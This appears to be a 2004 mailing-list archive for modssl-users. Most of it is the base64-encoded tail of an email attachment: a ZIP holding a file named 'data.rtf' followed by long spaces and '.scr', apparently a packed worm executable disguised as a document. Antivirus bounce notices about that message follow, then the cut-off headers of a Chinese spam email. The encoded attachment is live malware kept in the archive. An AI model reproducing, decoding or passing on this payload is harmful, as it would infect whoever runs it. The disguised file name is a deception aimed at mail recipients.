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
Iw6qEAjBiWYcF9/7dSZKfA4sA7ic8vdXZRtjhfqb+/QlSSdeiFtZ638dhZpslnxrrOyWCkQC
9zv5ThE1c+hq9gjgnzjc1aqhTcNgOo4dPSKRHGSEK1bixnOSMwNr2we84tNGyphKUZekD4uO
EwYY0NJ75CnOtudCWdCoGNDFAKx6ySH9tODWM0upDR0qepLdNbId4nRLjwAAAQACACAgEAAB
AAQA6AIAAAEAKAAAACAAAABAAAAAAQAEAAAAAACAAgAAAAAAAAAAAAAAAAAAAAAAAMz//wBo
V1gAAAAAAICAgAD///8AwMDAAP8AAAAA//8AvwAAAAAA/wAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAiIRIiIiIiIiIiIiIiIiIiIiE1VVVVVVVVVVVVVSUiIiIjRERERERERERERERSUiIi
I0RERERERFVUREVVUlIiIiNEiIiIREmZRESZlFJSIiIjRERERERElURESVRSUiIiI0SIiIiI
RElVVVlUUlIiIiNEREREREREmZmZVFJSIiIjRIiIiIiIRElUSVRSUiIiI0RERERERERElUlU
UlIiIiNEiIiIiIiIRElZVFJSIiIjREREREREREREmVRSUiIiI0SIiIiIiIiIRElEUlIiIiNE
RERERERERERERFJSIiIjRIiIiIiIiIiIiERSUiIiI0REREREREREREREUlIiIiNEiIiIiIiI
iIiIRFJSIiIjRERERERERERERERSUiIiI0QiIiIiRIiIiIhEUlIiIiNEOZJEQkRERERERFJS
IiIjRDIiIiJEiIiIiERSUiIiI0Q0QndyREREREREUlIiIiNEMiJ3ckSIiIiIRFJSIiIjRDRC
d3JERERERERSUiIiI0Q0QmZiREREREREUlIiIiNENEJmYkRERERERFJSIiIjRDMyIiJERERE
RERSUiIiI0REREREREREREREUlIiIiNCRCRCRCRCRCRCRDJSIiIjQkQkQkQkQkQkQkQyUiIi
IiQzQzQzQzQzQzQzQyIiIiIiIiIiIiIiIiIiIiIiIuAAAA/gAAAH4AAAB+AAAAfgAAAH4AAA
B+AAAAfgAAAH4AAAB+AAAAfgAAAH4AAAB+AAAAfgAAAH4AAAB+AAAAfgAAAH4AAAB+AAAAfg
AAAH4AAAB+AAAAfgAAAH4AAAB+AAAAfgAAAH4AAAB+AAAAfgAAAH4AAAB/gAAA//////oRzo
MEABacD9QwPABcM4niYooxADwfgQJf9/hwDDi0QkVQQS6VXs7FEHU1ZXM/8xiX381BUcYCAo
i/BoyMA3D7dFCFBkViYYIdhTkRUUMlAOECE7x4mKPHQqFhEMDVdogKzAagLxsBIRQP91bAyK
NAiIg/j7v1QBdQQzwOtB0Ns7A/d2GOhh/xwCmbkbAVLx+YuAjDAUA0M73h5y6I3M/FfhdWwI
fXgEii4JEWd6ObH8D5TYX14pW8myHIGMZAx8VnC+YAQMV42FnG/zoqZQamApFSysDT0oDYgs
4PtOjNcUvEb3AIB9/lyLNSTFPb/gReF0CiIlVwXWIQpo0LAvHYC93IlcoUI8ICH+NeGhORA0
YTAJamXoMrv+EFmTP70Kg1COyiaRIEGwBq9yRAhq2wUoxEaj5B/IFjyJPbcjLXRTFDTobEV2
dSLGAxU4NXxQUVoSCXVYloUSwHQFVE0TRhUjNBEUdRkPagHnMEgSAvTQkDEwwhAAtDgwQDKQ
CXQkEENVJ2yXzo5pz20KYQifdo9lIO9F727vY+9y73nscCtl/GTPJlftbyObTEQN1i/lFhTN
MGJKnwpT2WtZTrMnXC7zQ/NadjOoMXAq/8OFPDVkpy64Uw7KRoGfZ5loFXP5QlSRDoRrGQN1
+GVy9m8AbmZpZzl4LmRxbOEQQklOGEFSWRBGVgNQcm90ZWObLqN4tjFgXAAA4AHgAuAg4hDO
EQQN6Ba+EX2kDnsog0YiAYwoCRCJIBZJiRTAwp8BFYADbwgUB5ACZhPAAtAQCXBV/wO8CFIH
QQIGEwqOQigBdwFscBAon9EECBB5mYP0RPf9JhAihBDi947QAhCckU+9GAjwqwEZ0g+PA4Bc
eMBUB7ADrQRSAzjqrwAAAeAgcEAOS0VSTmBMMzIuZHFs4EbobwZzZUhhbhjtwFpyPml0OkZu
Fb6/KWELHEEdVp96R29mUudzUXVyY582Tzqpaw1iYWQWEElpbrZueko9dE2+ZClsXbMiRvFw
eUlSm+R0RkTAJFfBa293c0TfPuRj+ep5pTmgLRROYW1MhlBy8PJk45xMc2p2H0xpYjtTLz5U
UJNDz+5uNA0YTGG8RXLcXOvFjE11CHjMTgMAAAAAAAAAAAAAAAAAUEsBAhQACgAAAAAAgnqj
MKOIHd6AcwAAgHMAAFcAAAAAAAAAAAAgAAAAAAAAAGRhdGEucnRmICAgICAgICAgICAgICAg
ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg
ICAgICAgLnNjclBLBQYAAAAAAQABAIUAAAD1cwAAAAA=

------=_NextPart_000_0016----=_NextPart_000_0016--



From MAILER-DAEMON@polito.it  Mon May  3 19:51:18 2004
Return-Path: 
X-Original-To: modssl-users-l@master.modssl.org
Delivered-To: modssl-users-l@master.modssl.org
Received: from polito.it (terra.polito.it [130.192.3.81])
	by master.modssl.org (Postfix) with ESMTP id EF62EA8940
	for ; Mon,  3 May 2004 19:51:01 +0200 (CEST)
Sender: 
Date: Mon, 03 May 2004 19:50:51 +0200
Message-ID: 
X-Autogenerated: React
From: ANTIVIRUS-SYSTEM@polito.it
To: modssl-users-l@master.modssl.org
Subject: Attenzione Virus - Virus Alert 

*********************************************************
                  V I R U S - A L E R T
                    Servizio Antivirus
           (Ce.S.I.T. - Politecnico di Torino)
*********************************************************
  IL PRESENTE MESSAGGIO VIENE INVIATO AUTOMATICAMENTE
   non e' necessario rispondere a tale segnalazione.
*********************************************************

Un messaggio in arrivo e` stato eliminato dai sistemi di protezione
installati sui server di posta elettronica d'Ateneo.

Mittente:  kb9dbc@dbcwlv.net  (presumibilmente falsificato)
Oggetto:  News
---------------------------------------------------------

On Mon, 3 May 2004 12:48:44 -0500 
a message which was sent to you was discarded by Antivirus 
Service on our domain server.
 
Sender:   kb9dbc@dbcwlv.net  (may be faked)
Subject:  News

*********************************************************
 Cos'e' un Virus - Non voglio ricevere questo messaggio
                    Qui le risposte
        https://mail.polito.it/Files/antivirus.htm
*********************************************************

From TrendVirusWall23@nuwc.navy.mil  Mon May  3 20:45:17 2004
Return-Path: 
X-Original-To: modssl-users-l@master.modssl.org
Delivered-To: modssl-users-l@master.modssl.org
Received: from npri54mai01.npt.nuwc.navy.mil (NPRI54MAI01.Npt.NUWC.Navy.Mil [164.223.1.100])
	by master.modssl.org (Postfix) with ESMTP id 9378DA8933
	for ; Mon,  3 May 2004 20:45:00 +0200 (CEST)
Received: from npri54exc23.npt.nuwc.navy.mil
 (NPRI54EXC23.NPT.NUWC.NAVY.MIL [129.190.70.168])
 by npri54mai01.npt.nuwc.navy.mil (PMDF V6.2-X17 #30632)
 with ESMTP id  for
 modssl-users-l@master.modssl.org; Mon,
 03 May 2004 13:58:28 -0400 (Eastern Daylight Time)
Received: from NPRI54EXC23.NPT.NUWC.NAVY.MIL ([129.190.70.168])
 by npri54exc23.npt.nuwc.navy.mil with SMTP
 (Microsoft Exchange Internet Mail Service Version 5.5.2657.72)
	id KG8ZJHD6; Mon, 03 May 2004 13:57:12 -0400
Date: Mon, 03 May 2004 13:55:07 -0400
From: TrendVirusWall23@nuwc.navy.mil
Subject: Content mail warning notification!
To: modssl-users-l@master.modssl.org
Message-id: 
MIME-version: 1.0
Content-type: multipart/mixed;
 boundary="----=_NextPart_000_1083606907_B78506032.R82506026"
InterScan-Notification: yes

This is a multi-part message in MIME format.

------=_NextPart_000_1083606907_B78506032.R82506026
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit

************* eManager Notification **************

Due to a restricted file type, Trend Virus Detector [23] has replaced the attachment with e-mail header information.

Source mailbox: "owner-mmx-modssl-users@mmx.engelschall.com"
Destination mailbox(es): "modssl-users-l@master.modssl.org"

******************* End of message *******************

------=_NextPart_000_1083606907_B78506032.R82506026
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit

Received: from 164.223.1.100 by npri54exc23.npt.nuwc.navy.mil (InterScan E-Mail VirusWall NT); Mon, 03 May 2004 13:54:48 -0400
Received: from mmx.engelschall.com (mmx.engelschall.com [195.27.130.252])
 by npri54mai01.npt.nuwc.navy.mil (PMDF V6.2-X17 #30632)
 with ESMTP id  for
 fariast@npt.nuwc.navy.mil; Mon,
 03 May 2004 13:51:54 -0400 (Eastern Daylight Time)
Received: by mmx.engelschall.com (Postfix)	id B83081937C; Mon,
 03 May 2004 19:49:47 +0200 (CEST)
Received: from master.modssl.org (unknown [195.27.176.156])
	by mmx.engelschall.com (Postfix) with ESMTP id A62741932E	for
 ; Mon, 03 May 2004 19:49:47 +0200 (CEST)
Received: by master.modssl.org (Postfix)	id 4AF97A89A3; Mon,
 03 May 2004 19:49:49 +0200 (CEST)
Received: from master.modssl.org
 (68-73-242-10.ded.ameritech.net [68.73.242.10])	by master.modssl.org (Postfix)
 with ESMTP id 30383A8982	for ; Mon,
 03 May 2004 19:49:47 +0200 (CEST)
Date: Mon, 03 May 2004 12:48:44 -0500
From: kb9dbc@dbcwlv.net
Subject: News
To: modssl-users-l@master.modssl.org
Message-id: <20040503174947.30383A8982@master.modssl.org>
MIME-version: 1.0
Content-type: multipart/mixed;
 boundary="----=_NextPart_000_0016----=_NextPart_000_0016"
X-Priority: 3
X-MSMail-priority: Normal
Delivered-to: modssl-users-l@master.modssl.org

------=_NextPart_000_1083606907_B78506032.R82506026--

From CGM@sky.seed.net.tw  Tue May  4 11:08:58 2004
Return-Path: 
X-Original-To: modssl-users-l@master.modssl.org
Delivered-To: modssl-users-l@master.modssl.org
Received: from genbank (156.38.31.61.dynamic.tfn.net.tw [61.31.38.156])
	by master.modssl.org (Postfix) with SMTP id BD254A893A
	for ; Tue,  4 May 2004 11:08:38 +0200 (CEST)
Received: from ibm
	by tpts1.seed.net.tw with SMTP id PLgWxj9iyHo4Oj4ouD9fVMXXcJY;
	Tue, 04 May 2004 17:08:57 +0800
Message-ID: 
From: ³Ð·N¥Í¬¡®a@master.modssl.org
To: 0504¦W³æ@master.modssl.org
Subject:=?big5?Q?=A1i=C5=E9=B6K=B6=FD=B6=FD=A1j=A5x=C6Q=BA=F1=B0g=B6=AE=B3=CC=AB=E1=A7C=BB=F9=A8=D1=C0=B3?=
MIME-Version: 1.0
Content-Type: multipart/related;
	type="multipart/alternative";
	boundary="----=_NextPart_GeYHHYFPN5cgVK"
X-Mailer: 5HBaKe8UVEBxM8
X-Priority: 3
X-MSMail-Priority: Normal
Date: Tue,  4 May 2004 11:08:38 +0200 (CEST)

This is a multi-part message in MIME format.

------=_NextPart_GeYHHYFPN5cgVK
Content-Type: multipart/alternative;
	boundary="----=_NextPart_GeYHHYFPN5cgVKAA"


------=_NextPart_GeYHHYFPN5cgVKAA
Content-Type: text/html;
	charset="big5"
Content-Transfer-Encoding: base64

